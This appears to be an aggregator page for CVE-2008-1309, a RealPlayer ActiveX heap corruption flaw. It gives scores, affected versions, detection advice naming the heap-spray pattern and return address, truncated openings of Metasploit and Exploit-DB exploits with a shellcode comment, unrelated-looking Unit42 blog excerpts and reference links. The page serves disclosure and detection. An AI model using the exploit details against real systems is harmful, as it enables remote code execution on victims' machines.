CVE-2008-1309
Published 2008-03-12
Priority P258 · critical · 9.3 (CVSS 2.0) · AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 45.95% (98.7th percentile)
The RealAudioObjects.RealAudio ActiveX control in rmoc3260.dll in RealNetworks RealPlayer Enterprise, RealPlayer 10, RealPlayer 10.5 before build 6.0.12.1675, and RealPlayer 11 before 11.0.3 build 6.0.14.806 does not properly manage memory for the (1) Console or (2) Controls property, which allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via a series of assignments of long string values, which triggers an overwrite of freed heap memory.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
Detection & IOCs (extracted from sources)
Bytes: %u0C0C%u0C0C (heap spray NOP sled pattern)
- Detect ActiveX instantiation of the RealAudioObjects.RealAudio control (rmoc3260.dll) in a browser context, particularly when the Console or Controls property is set to a long string value repeatedly.
- Look for heap spray patterns using the 0x0C0C0C0C address in browser memory or JavaScript unescape sequences containing %u0C0C%u0C0C, which is the NOP sled used in known exploits for this CVE.
- Monitor for repeated property assignments of long strings to the Console or Controls properties of the RealAudioObjects.RealAudio ActiveX control, which triggers the use-after-free heap overwrite.
- Flag browser crashes or abnormal termination when rmoc3260.dll is loaded, as denial-of-service via heap corruption is a known outcome of exploitation attempts.
- Vulnerable versions are RealPlayer 10.5 before build 6.0.12.1675 and RealPlayer 11 before build 6.0.14.806; detections should be scoped to these version ranges to reduce false positives.
- Red Hat Enterprise Linux 3 Extras, 4 Extras, and 5 Supplementary are confirmed not affected; exclude these platforms from detection scope.
- The Metasploit module targets Windows XP SP0-SP3 with IE 6.0 SP0-2 and IE 7.0 English specifically; the heap spray offset and return address (0x0C0C0C0C) are target-specific and may differ for other configurations.
CVSS provenance
nvd · v2.0 · 9.3 CRITICAL · AV:N/AC:M/Au:N/C:C/I:C/A:C
vendor_redhat · 9.3 CRITICAL
GHSA
GHSA-g64h-446x-5j6x: The RealAudioObjects
ghsa_unreviewed·2022-05-01
CVE-2008-1309 [HIGH] GHSA-g64h-446x-5j6x: The RealAudioObjects
Red Hat
CVE-2008-1309: The RealAudioObjects
vendor_redhat·CVSS 9.3
CVE-2008-1309 [CRITICAL] CVE-2008-1309: The RealAudioObjects
Statement: Not vulnerable. This issue did not affect versions of RealPlayer as shipped with Red Hat Enterprise Linux 3 Extras, 4 Extras, or 5 Supplementary.
No detection rules found.
Exploit-DB
RealPlayer - 'rmoc3260.dll' ActiveX Control Heap Corruption (Metasploit)
exploitdb·2010-06-15
---
##
# $Id: realplayer_console.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'RealPlayer rmoc3260.dll ActiveX Control Heap Corruption',
'Description' => %q{
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control.
By sending a specially crafted string to the 'Console' property
in the rmoc3260.dll control, an attacker may be able to execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ '
Exploit-DB
Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution
exploitdb·2008-04-01
---
Real Player rmoc3260.dll ActiveX Control Remote Code Execution Exploit
function Check() {
// win32_exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com
Metasploit
RealPlayer rmoc3260.dll ActiveX Control Heap Corruption
metasploit
This module exploits a heap corruption vulnerability in the RealPlayer ActiveX control. By sending a specially crafted string to the 'Console' property in the rmoc3260.dll control, an attacker may be able to execute arbitrary code.
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
[HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Executive Summary
Our Unit 42 research team routinely evaluates the data from our Email Link Analysis (ELINK) system. In examining the data it collects, which are URLs extracted from emails or submitted by API, we can identify patterns and trends which help us discern prevalent web threats. This blog is the fourth (4th quarter of 2018) installment in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, CVEs, and now, phishing scams.
The key findings in this quarter’s report in summary are:
1. After Q4 saw an increase in malicious URLs, ending a trend of decreasing malicious URLs starting in Q1 and continuing through Q3.
2. For the first time in our tracking, the United States is not the number one
Unit42
Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
blogs_unit42·2019-05-30·CVSS 8.8
CVE-2018-8174 [HIGH] Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
## Web-based Threats-2018 Q4: France Rises to #1 for Malicious URL Hosting, US #1 for Phishing
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Published: May 30, 2019
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
[CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
# Executive Summary
Our Email Link Analysis (ELINK) system is routinely reviewed by our Unit 42 research team. In examining the data it collects, patterns and trends are discovered which helps us discern prevalent web threats. This blog is the third (3rd quarter of 2018) in a series of posts tracking web-based threats throughout the year, specifically statistics pertaining to malicious URLs, domains, exploit kits, and CVEs.
During Quarter 3 (Q3), July – September, a notable shift occurred with the malicious URL and domain data; there was a significant drop in the number of malicious URLs as well as a drop in malicious domains that will be discussed below. In addition, we will be covering an interesting malicious Flash SWF that exploits CVE-2015-5119.
# URLs
Based on our analysis of dat
Unit42
Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
blogs_unit42·2018-12-27·CVSS 9.8
CVE-2015-5119 [CRITICAL] Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
## Web-based Threats-2018 Q3: Malicious URLs and Domains take a Dip
Bo Qu
Tao Yan
Rongbo Shao
Zhanglin He
Xingyu Jin
Published: December 27, 2018
http://lists.grok.org.uk/pipermail/full-disclosure/2008-March/060659.html
http://secunia.com/advisories/29315
http://service.real.com/realplayer/security/07252008_player/en/
http://www.kb.cert.org/vuls/id/831457
http://www.securityfocus.com/archive/1/494779/100/0/threaded
http://www.securityfocus.com/bid/28157
http://www.securitytracker.com/id?1019576
http://www.securitytracker.com/id?1020563
http://www.vupen.com/english/advisories/2008/0842
http://www.vupen.com/english/advisories/2008/2194/references
http://www.zerodayinitiative.com/advisories/ZDI-08-047/
https://exchange.xforce.ibmcloud.com/vulnerabilities/41087
https://www.exploit-db.com/exploits/5332
Published: 2008-03-12